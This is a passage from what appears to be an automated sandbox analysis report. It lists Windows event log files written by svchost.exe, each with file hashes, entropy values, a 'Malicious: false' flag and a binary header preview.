.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.345558376333852
Encrypted:	false
SSDEEP:	768:qcMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9Hhr:rMhFBuV
MD5:	1FEB35D2E03E5CC80B9398DB36A42E0B
SHA1:	7971AAE057B818A6AB163F31AE34636B0A83AEDB
SHA-256:	894955C428CB4C9AE713EF1FFCE7554B296C83735EE3394DFF3A6D2C384DF078
SHA-512:	6025B86C9B49A95A0342A3001B6B8CA66E8015905CF6F0FCEB1BDB56D5D124515E8B47537A4044EC9E121542E7C1A3F01D36CCEFF59F1728B3153C598BEEB5A6
Malicious:	false
Preview:	ElfChnk.........N...............N...........8........C.t.....................................................................h..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.894211292109946
Encrypted:	false
SSDEEP:	768:hGqQQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9JXc:FHuz
MD5:	C6D5477794C240DE679460A41111ED92
SHA1:	AF6D2D21B4C79A0E04F985D02E4FAE14FB77A910
SHA-256:	5B28E6EC41CDD53A8D507CC443E5A0FA6ECD3D36A30EFC9B6DF31C1DEF4E13AB
SHA-512:	8B1A46E451454F82C8AFB0AEE44E5E2DE904A5A0A59A712D09299EB5FBF89EE5EE68C5AF8CCBCB65ED52F71A5A761108B228769D927A194EB5B716C0C5127117
Malicious:	false
Preview:	ElfChnk.v.......x.......v.......x...........P...`....\[.....................................................................m..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......+...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9991604740921518
Encrypted:	false
SSDEEP:	384:+h1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDe:+MAP1Qa5AgfQQzy
MD5:	2E147AB218440934D79EE695F1C11233
SHA1:	50E4AB8FB1E7AABB82EA29EF31D36D98BD2BFE60
SHA-256:	D1586342BF0A93CBD5D99975944D70CDB5CE6457CEDAE931ACC50A2A55E7E0D2
SHA-512:	B60F81C2F53138D8FA9B2B97208FFA306C7B9AD33A7E377DFA53CF29C280BA8774B62716DDE70A44BAD1DAC488518A021C07B6CD85CCDED4DBA85AD052CECCF2
Malicious:	false
Preview:	ElfChnk......................................c...f..........................................................................vc.)................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.441017411582523
Encrypted:	false
SSDEEP:	384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
MD5:	8D30244BF7119CFA2F8A7A5AF8FCDAB7
SHA1:	F0827675265E0DF98A4967D8A539D476551DCAA6
SHA-256:	489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
SHA-512:	C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
Malicious:	false
Preview:	ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U..&....$..........."..............=1......*......q........\|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2803522685445374
Encrypted:	false
SSDEEP:	384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
MD5:	4A70DB2946C129829BEDDB2E147FBE04
SHA1:	4D3255FABE0E857840591072D9370047FDDFB83A
SHA-256:	C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
SHA-512:	7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
Malicious:	false
Preview:	ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.445920452673848
Encrypted:	false
SSDEEP:	384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
MD5:	21B26F726BBEBA7FD5C4C45386FC544F
SHA1:	F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
SHA-256:	63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
SHA-512:	A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
Malicious:	false
Preview:	ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1562721664799103
Encrypted:	false
SSDEEP:	384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
MD5:	B2C3D7448B237C268D23FE1A78777AA5
SHA1:	6C3A39325392F2B088C00CDC1763268F15832447
SHA-256:	05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
SHA-512:	F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
Malicious:	false
Preview:	ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9195298486885948
Encrypted:	false
SSDEEP:	384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
MD5:	D4A00CC59E964B7DFD6EFDB643322E9E
SHA1:	7307AF862B22D743BF6B531829DABE041E9F1F92
SHA-256:	49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
SHA-512:	51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
Category:	dropped
Size (bytes):	69080
Entropy (8bit):	0.5731539143121821
Encrypted:	false
SSDEEP:	96:435NVaO8ioBOPKzUmOPZXOOPoQ5NVaO8ioBOPKzUmOPZXOOPo:437V7cOP4XOP4OPz7V7cOP4XOP4OP
MD5:	3215BB454414F0861355E062F441131B
SHA1:	CC4D9DE3AE6F9F5366A1429DCC592349FAF3207A
SHA-256:	2F51CA78F4B08A2AED583B995662BDEB99822BCC8AF3FC2A85C4C8D2EC91451C
SHA-512:	9B556C7F51A82DC7D718E7F94F2C62540EBA2C8A0D7E7922884AAA878D073B61808FE5A8CD1E993D66FCA3DC853DC07909C46D8C96E705FF66084998E1B0391A
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X....+.....................................................................ehq&................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..p...~.........Jf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.712800314026489
Encrypted:	false
SSDEEP:	384:jhKa5SzuzNz0zxzuewKWMKFza5rta5ya5e69a5nla5f2KnzyzIzka50bba5Wa5HJ:jfSik7ELy7KR6Cx0INAG
MD5:	1EBFD1F27E1F9FAC086C1B19A7D5E927
SHA1:	43501F2C49CF111F203E67E38D48DA155A118524
SHA-256:	EA28E3CB2A066ACFE3B9E49DC53158C69D01780DFED91E6B1E4A41716C92D144
SHA-512:	2081B56F975355F7E6F41742EFC2D645F0BC07708427F18EA3EF4B6C3B7AEE5855A2C2CF9A7A8F06928B342F3D82181FBB2C542EF708AE151AA6B61EEC9FD922
Malicious:	false
Preview:	ElfChnk.....................................H...@...Y.~................................................................................................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................V...........................1...{!......**...............O..e.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.119748237037944
Encrypted:	false
SSDEEP:	384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
MD5:	D1CFC256BC075DC75D7FD92207C9C0F2
SHA1:	587C19CF65305AD470E82AB5A1ED5B2E36472625
SHA-256:	6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
SHA-512:	85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
Malicious:	false
Preview:	ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.182756017330751
Encrypted:	false
SSDEEP:	384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
MD5:	9BA8F6B60705B6A27084436D1D4370AD
SHA1:	DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
SHA-256:	580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
SHA-512:	BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
Malicious:	false
Preview:	ElfChnk.....................................8.......I#.e......................................................................hB................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.140387557527179
Encrypted:	false
SSDEEP:	384:B3hDIEQAGxIHIFIWwIfyITMIcIZIMIf0ITEIAI/IuIGvqIfIOIOIv0IfCOiIThIe:B3ZxGe6dSS
MD5:	A5A04FB3E58E4B7633C7581966A2ED15
SHA1:	735EB21B3BA2BC8B7A2D52B0BF1FC64E1CEA7295
SHA-256:	3AC90621C625D7A73EF0CFEDB3DC6A4DE3E6F64965593FF4167F61113B0190F3
SHA-512:	4E26D6FA25DC4D3249B5FB86E96870243E9B6A9E85684D2D6DEE0A9DB7802EE412EA18D6EE64F2128A7B6DEFE3CFEBC22C9F6F89CA49B4C0EF10388F3832A7B2
Malicious:	false
Preview:	ElfChnk.T...............T...........................ky.'...............................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1............................V...........6..........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.800476718060657
Encrypted:	false
SSDEEP:	384:7h6iIvcImIvITIQIoIoI3IEIMIoIBIzI9IwWInIE1IFtI:7oxqV
MD5:	F25E3A5940E51F9A49AC271DE377E2C1
SHA1:	38EB4D0BCB8EA4C72C03AD88CF9B7136C39BCDC5
SHA-256:	D2B29761907A72BE3EC03C586D87729FF91EE3D9A6CF39319FD90A1977602663
SHA-512:	CADA8EFD9868D26AA1B4DBC5A5BDD31E624547E5755ED7B413EA74D69AB731B000BB2B8FCBDD3027FDA278A7D69058DF4BE3BAEE5AB253055C70EDE7D3AA9993
Malicious:	false
Preview:	ElfChnk.....................................X"...#.../......................................................................V)..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.999140584854273
Encrypted:	false
SSDEEP:	768:q4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH135:o
MD5:	5234109523F4243D8DFEEAFD9202BC60
SHA1:	49A4B237FB8BEE3A2BDAA0C20A579E06D2645F65
SHA-256:	D4CE68FD0E970CC24971E8258B962534A3BF7CB1F1E6209AA0BB1D09F4FB80E6
SHA-512:	C2CC9A4E7282BF37C4113FADBA4F7FDD1D2094B8F40FE145C58A5ABEE4A90BCD55FBD8876415BD9140EBEE36314D02FEE5525076B539BB5AA01FB1D32058B426
Malicious:	false
Preview:	ElfChnk.....................................(...8...\|.........................................................................6................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69152
Entropy (8bit):	4.013580942745841
Encrypted:	false
SSDEEP:	768:HQ+wQicZv76NcRkpHrWbGyYKQc90XEztputDBjV8k+u7e4tHpoVWWHjRKvc90X:tztputDBjV8k+u7HtHpoVW
MD5:	5682E4E8C2E118F2B2D59E5F66CB4298
SHA1:	54CCEB3A3A8E0B26AF8D17766313093F1F632AF2
SHA-256:	3FB24183699B3631BEEDF7C761FC35179B78DCFD57AEF84EA652D18ABE1660A7
SHA-512:	6D215EC4ECE7C1A8FDE878BD0F28ADFDED5FFFB10A1707693D150BF0D353DD4032240EA4021885C38D5B4AD58A3E137A741C63548744C8C075104BE1030DA11C
Malicious:	false
Preview:	ElfChnk.................J.......W...........`..........7....................................................................ONx.................2...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.........................................x...P.......B.[t...........Z..&...............................................................8.......P.....!.................B.[t....0.U.f...."V.f.......@...P........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L..........u.e. x.........Q.........ut...........Z..&...............................................................8.......P...C.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.419779440632166
Encrypted:	false
SSDEEP:	384:RhWKyzK5SK+jKLSKDlKMAwpTKZDGKPK9KyKJSK2KVKzKAGP1K6GSKzKhMK7KS3Kt:RIgpCnz/Gh4wRub4VAPdHc08D
MD5:	F492A17F866F277E11EBADDFB17DDDE2
SHA1:	B4189626A2411D58BCC61FB5B000BB20463F7CDA
SHA-256:	67172CEFF09C1BEB757C734CA01C61542B350C0B083A2CDD33E4913BA873C067
SHA-512:	8B7CF69CBAA659F3CA0176611DB2ADC35AB330E4470F1EB7DFD7B23CFCF31CE7CA7CAFEEB1BD3EB6D0B7725C3A51E83F9B9A91E8BB4493FB516CDFCCFF33A4B6
Malicious:	false
Preview:	ElfChnk.........[...............[...........`..........]....................................................................t^.a................p...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................'f.......D...T.......................s..........O....p...h............../$...............}..**................qdf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.760021633915647
Encrypted:	false
SSDEEP:	384:4hP8o8Z85848V8M8g8D8R8E8C888FB8J8a8:4R
MD5:	91415CB1A68CB19DCDB017402AAEB51E
SHA1:	EEEB808B9D0DFB3DB247AA10B64290A5029EAB89
SHA-256:	EDEE7AB462BF2D986393D24304BDEF02415A6E0483DE793BD452E169B7D08170
SHA-512:	C2F5AF43559DCE7BB66ABE305DF2DCFF0C95E2CF431D8DD0B6A02E216C8F4329C3B888BF2BF378918851A3066976FCEE745593B60970E5B9843535E6301E5BA0
Malicious:	false
Preview:	ElfChnk.........................................8!..$.0v....................................................................>...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.764203104271766
Encrypted:	false
SSDEEP:	1536:MXhRUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:MXXnS
MD5:	176F1E65123BB628ACDC88E289158866
SHA1:	C66B66E50A7ED10D92E567B1B3AD99CC95BB13DF
SHA-256:	EA508D1A253C409B864CBB714F8678628F68E394ABAAB844A8D296DDD4927AB6
SHA-512:	73ECFF6243F21B5611E23963B0B7BA3ABBFD9D1F483EB2486546FD09AC0100CD01560CC2F4C856F583133B01A5C2CE32C13559547E7374BDFE30D195D9228D36
Malicious:	false
Preview:	ElfChnk.........'...............'............I...J..........................................................................s...................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................>..............O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4373812410985773
Encrypted:	false
